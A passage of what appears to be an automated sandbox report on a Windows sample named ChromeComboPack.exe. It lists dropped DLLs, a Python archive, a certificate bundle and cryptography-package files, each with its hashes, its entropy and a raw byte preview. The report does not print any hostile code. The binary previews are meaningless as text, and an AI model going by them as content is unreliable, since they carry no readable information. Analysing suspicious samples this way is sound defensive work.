                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d.....f.........." ...(. ...>......@................................................J....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):56088
                                                                                                                                                                                                                                            Entropy (8bit):6.331247108655531
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Minr44gaZPXxCJ/+yZdDDr5I1Xtw7Sy+xmS2:M3J/+yZdDDr5I1Xtwf
                                                                                                                                                                                                                                            MD5:DF92EA698A3D0729B70A4306BBE3029F
                                                                                                                                                                                                                                            SHA1:B82F3A43568148C64A46E2774AEC39BF1F2D3C1E
                                                                                                                                                                                                                                            SHA-256:46DEC978EC8CB2146854739BFEDDEA93335DCC92A25D719352B94F9517855032
                                                                                                                                                                                                                                            SHA-512:BDEBAFE1B40244A0CB6C97E75424F79CFE395774A9D03CDB02F82083110C1F4BDCAC2819BA1845AD1C56E2D2E6506DCC1833E4EB269BB0F620F0EB73B4D47817
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d.....f.........." ...(.N...`.......................................................M....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32536
                                                                                                                                                                                                                                            Entropy (8bit):6.552970921547832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:1lzRmezd6rGjMoW4BI1QUGL5YiSyv8+WAMxkEW7:LRm0MGooW4BI1QUG17SyIxC7
                                                                                                                                                                                                                                            MD5:7D91DD8E5F1DBC3058EA399F5F31C1E6
                                                                                                                                                                                                                                            SHA1:B983653B9F2DF66E721ECE95F086C2F933D303FC
                                                                                                                                                                                                                                            SHA-256:76BBA42B1392DC57A867AEF385B990FA302A4F1DCF453705AC119C9C98A36E8D
                                                                                                                                                                                                                                            SHA-512:B8E7369DA79255A4BB2ED91BA0C313B4578EE45C94E6BC74582FC14F8B2984ED8FCDA0434A5BD3B72EA704E6E8FD8CBF1901F325E774475E4F28961483D6C7CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.....8.......................................................x....`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83736
                                                                                                                                                                                                                                            Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                                            MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                                            SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                                            SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                                            SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.261856601346184
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:qWdTrLGXVx7Qt+HEGGCO4w5yVrrPrrrrrrbEOyfgv/pWwb8lI1OQaX9:jAVxMt7YC5yrWgHos8X
                                                                                                                                                                                                                                            MD5:F8869058C1F6F6352309D774C0FEFDE9
                                                                                                                                                                                                                                            SHA1:4A9FD6C93785C6B6C53F33946E9B1CA5DB52A4E9
                                                                                                                                                                                                                                            SHA-256:FB00951D39084E88871C813D6C4043CE8AFB60AB6D012E699DDD607BAA10F6E1
                                                                                                                                                                                                                                            SHA-512:37205B755985CDBB16F806CDA8E7637164D1D62F410EA07501739215B9E410E91997110600EAD999D726CB15EC4AEF3ABF673E7AD47D3CA076457C89EA2B401C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d......f.........." ...(.................................................................`.........................................@o..P....o..................D......../.......... ...T...............................@............................................text...X........................... ..`.rdata..b...........................@..@.data................~..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178456
                                                                                                                                                                                                                                            Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                                            MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                                            SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                                            SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                                            SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):37656
                                                                                                                                                                                                                                            Entropy (8bit):6.341257574556273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:r/mqQhTcYsjNxO0tI1Ci75YiSyvNhAMxkE9x2:Dm7GFNxO0tI1CiF7SynxRI
                                                                                                                                                                                                                                            MD5:BED7B0CED98FA065A9B8FE62E328713F
                                                                                                                                                                                                                                            SHA1:E329EBCA2DF8889B78CE666E3FB909B4690D2DAA
                                                                                                                                                                                                                                            SHA-256:5818679010BB536A3D463EEEE8CE203E880A8CD1C06BF1CB6C416AB0DC024D94
                                                                                                                                                                                                                                            SHA-512:C95F7BB6CA9AFBA50BF0727E971DFF7326CE0E23A4BFA44D62F2ED67ED5FEDE1B018519DBFA0ED3091D485ED0ACE68B52DD0BB2921C9C1E3BC1FA875CD3D2366
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.L...L...L...E..J.......H.......H.......D...Y...N.......Q.......K...L...........M...Y...M...Y...M...Y...M...Y...M...RichL...........PE..d....f.........." ...(.*...<.......(..............................................@.....`..........................................V..H...HV..................x....d.../......t...dG..T............................C..@............@.......S..@....................text...n(.......*.................. ..`.rdata..4 ...@..."..................@..@.data........p.......P..............@....pdata..x............T..............@..@.rsrc................X..............@..@.reloc..t............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1332769
                                                                                                                                                                                                                                            Entropy (8bit):5.5865428536147945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzGX7j7YQqPQCxi2hdmSPwHg1d6R1RbtRwvn:VHlJGUDa+zG/7UlZhdmSPyaQHtRwvn
                                                                                                                                                                                                                                            MD5:763D1A751C5D47212FBF0CAEA63F46F5
                                                                                                                                                                                                                                            SHA1:845EAA1046A47B5CF376B3DBEFCF7497AF25F180
                                                                                                                                                                                                                                            SHA-256:378A4B40F4FA4A8229C93E0AFEE819085251AF03402CCEFA3B469651E50E60B7
                                                                                                                                                                                                                                            SHA-512:BB356DD610E6035F4002671440CE96624ADDF9A89FD952A6419647A528A551A6CCD0ECA0EE2EEB080D9AAD683B5AFC9415C721FA62C3BCDDCB7F1923F59D9C45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                                            Entropy (8bit):4.674392865869017
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
                                                                                                                                                                                                                                            MD5:D9E0217A89D9B9D1D778F7E197E0C191
                                                                                                                                                                                                                                            SHA1:EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
                                                                                                                                                                                                                                            SHA-256:ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
                                                                                                                                                                                                                                            SHA-512:3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):122880
                                                                                                                                                                                                                                            Entropy (8bit):5.917175475547778
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
                                                                                                                                                                                                                                            MD5:BF9A9DA1CF3C98346002648C3EAE6DCF
                                                                                                                                                                                                                                            SHA1:DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
                                                                                                                                                                                                                                            SHA-256:4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
                                                                                                                                                                                                                                            SHA-512:7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5440
                                                                                                                                                                                                                                            Entropy (8bit):5.074342830021076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DlaQIUQIhQIKQILbQIRIaMPktjaVxsxA2TtLDmplH7dwnqTIvrUmA0JQTQCQx5KN:LcPuP1srTtLDmplH7JTIvYX0JQTQ9x54
                                                                                                                                                                                                                                            MD5:554DC6138FDBF98B7F1EDFE207AF3D67
                                                                                                                                                                                                                                            SHA1:B6C806E2AFF9A0F560916A90F793348DBF0514BA
                                                                                                                                                                                                                                            SHA-256:0064A9B5FD2AC18605E512EF7127318AD9CF259E9445488C169F237A590602E1
                                                                                                                                                                                                                                            SHA-512:3A71B533874F4D0F94F15192791D2FA4DF9E8EBF184C711F1D4FA97230C04764C1C9A93258355B08107E5B72053C6901E883E3DB577E8A204D5B9EB3F8BC7BFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.1.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15579
                                                                                                                                                                                                                                            Entropy (8bit):5.567434003079107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bX1ToLbz5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:bXeLbhCEsJrPB6s7B0Ppz+96innVB
                                                                                                                                                                                                                                            MD5:E8478B758300439BF58613F2A3A2676C
                                                                                                                                                                                                                                            SHA1:39ED064E67212A54E4B8D1C909E6AD2ACF48025D
                                                                                                                                                                                                                                            SHA-256:5ADEAA62D3045659DDF79324823AA3BCB1CA78F264442D6F6F6B9C8A8470A634
                                                                                                                                                                                                                                            SHA-512:D7029823DC5585FBE885DDB52EED2D02D1584EB945EF23916391201FCBD17DF0B14F338BDFC6E81318297F831CA99796423206F781373857317E068F0C0B321C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:cryptography-43.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.1.dist-info/METADATA,sha256=AGSptf0qwYYF5RLvcScxitnPJZ6URUiMFp8jelkGAuE,5440..cryptography-43.0.1.dist-info/RECORD,,..cryptography-43.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.1.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.1.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.1.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.1.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=pY_pmYXjJTK-LjfCu7ot0NMj0QC2dkD1dCPyV8QjISM,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94
                                                                                                                                                                                                                                            Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                            MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                                                                                                                                                            SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                            SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                            SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                            MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                            SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                            SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                            SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11360
                                                                                                                                                                                                                                            Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                            MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                            SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                            SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                            SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1532
                                                                                                                                                                                                                                            Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                            MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                            SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
